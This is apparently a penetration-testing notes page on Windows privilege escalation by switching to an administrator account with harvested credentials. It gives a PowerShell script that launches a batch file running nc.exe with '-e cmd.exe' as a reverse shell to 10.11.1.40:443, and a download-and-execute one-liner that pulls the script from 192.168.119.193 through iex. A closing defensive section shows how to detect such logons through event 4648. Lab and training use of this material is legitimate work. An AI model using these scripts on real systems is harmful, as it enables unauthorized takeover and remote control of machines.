SUDO SU

  • If you have ever used Linux, you are probably aware of the sudo command. It lets us run a command as a different user, most often as root. On some Linux distributions the su command lets us log in directly as root. Because that is dangerous, direct root login is disabled by default on most distributions, such as Ubuntu.

  • So while Linux users have the sudo command to switch user accounts or run commands as the super user, what do Windows users have?

Windows has no direct equivalent, but we have the alternatives below.

  1. Runas command

  2. Powershell script for switching user

When can we use it?

  • Suppose we have compromised a Windows system through a network or web application vulnerability and have a low privileged user shell.

  • Suppose also that we have obtained Administrator credentials by compromising another system in the domain, for example with hashdump, wce.exe, fgdump.exe or any other tool.

Example

  • Suppose the credentials are b33f:b33fpassword

    • The point to note here is that there may be times when we know the credentials of an admin user but only have a low privileged shell as some other user, and Remote Desktop is not enabled, so we cannot log in as that user. Unlike Linux, we cannot sudo on Windows, so we use the switch-user functionality instead.

  • The first thing we always check after getting a low privileged shell on a Windows system is who we are:

whoami

echo %username%
  • Next, check all the user accounts and the privileges each of them has:

net users

So let's switch user to b33f and escalate privileges.

Runas

  • We can use the runas command to switch user. However, from a low privileged shell it will sometimes not prompt for password input, because runas reads the password directly from the console and a non-interactive shell does not provide one.

  • Runas is a very useful command on Windows. It lets you run a program in the context of another user account.

runas /user:username program

If the above command asks for a password, well and good: we enter the password and get a shell with escalated privileges. If it does not prompt for a password, we fall back to the PowerShell script below.

Powershell

  • Create the two files below and transfer them to the low privileged shell along with nc.exe.

ps-sudo.ps1

# Build a PSCredential for the target account (the b33f credentials from the example above)
$pw = ConvertTo-SecureString "b33fpassword" -AsPlainText -Force
$pp = New-Object System.Management.Automation.PSCredential -ArgumentList "b33f", $pw
$script = 'C:\Windows\Temp\nc.bat'
# Start a PowerShell process as b33f; it launches nc.bat, which connects back to our listener
Start-Process powershell -Credential $pp -ArgumentList "-noprofile -command &{Start-Process $script -verb Runas}"

nc.bat

REM Connect back to our listener on 10.11.1.40:443 and hand it cmd.exe
C:\Windows\Temp\nc.exe 10.11.1.40 443 -e cmd.exe

Executing the script

powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')
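A defender-side check for the technique on this page, added here as an example that is not part of the original notes: both runas and Start-Process -Credential log on with explicit credentials, which Windows records as Security event 4648 ("A logon was attempted using explicit credentials"). This PowerShell function reads those events and lists who launched what as whom. Get-WinEvent and the 4648 EventData field names are real; the -MaxEvents sizing and the process-name filter at the end are this example's own assumptions.

```powershell
# Added example, not from the original notes. Lists recent explicit-credential
# logons (Security event 4648), which runas.exe and Start-Process -Credential
# generate on the host. Run from an elevated PowerShell with read access to
# the Security log. The -MaxEvents default is an assumption for sample sizing.
function Get-ExplicitCredentialLogons {
    param([int]$MaxEvents = 50)

    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4648 } -MaxEvents $MaxEvents |
        ForEach-Object {
            # Each 4648 record carries its details as <Data Name="..."> elements
            $xml = [xml]$_.ToXml()
            $d = @{}
            foreach ($node in $xml.Event.EventData.Data) { $d[$node.Name] = $node.'#text' }

            [pscustomobject]@{
                Time       = $_.TimeCreated
                Subject    = "$($d.SubjectDomainName)\$($d.SubjectUserName)"   # who asked
                Target     = "$($d.TargetDomainName)\$($d.TargetUserName)"     # which account was used
                Process    = $d.ProcessName                                    # launcher (runas.exe, powershell.exe, ...)
                TargetHost = $d.TargetServerName
            }
        }
}

# Surface cases where one account launched a program as a different account via
# runas.exe or powershell.exe, the two launchers used on this page (filter is an assumption).
Get-ExplicitCredentialLogons -MaxEvents 200 |
    Where-Object { $_.Process -match '\\(runas|powershell)\.exe$' -and $_.Subject -ne $_.Target } |
    Format-Table -AutoSize
```

On a quiet workstation the filtered output should be short, so a low privileged account suddenly appearing as Subject with an administrator as Target is worth a look; the PSCredential route shows up here just as runas does, since both go through the same explicit-credential logon.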

Last updated 3 years ago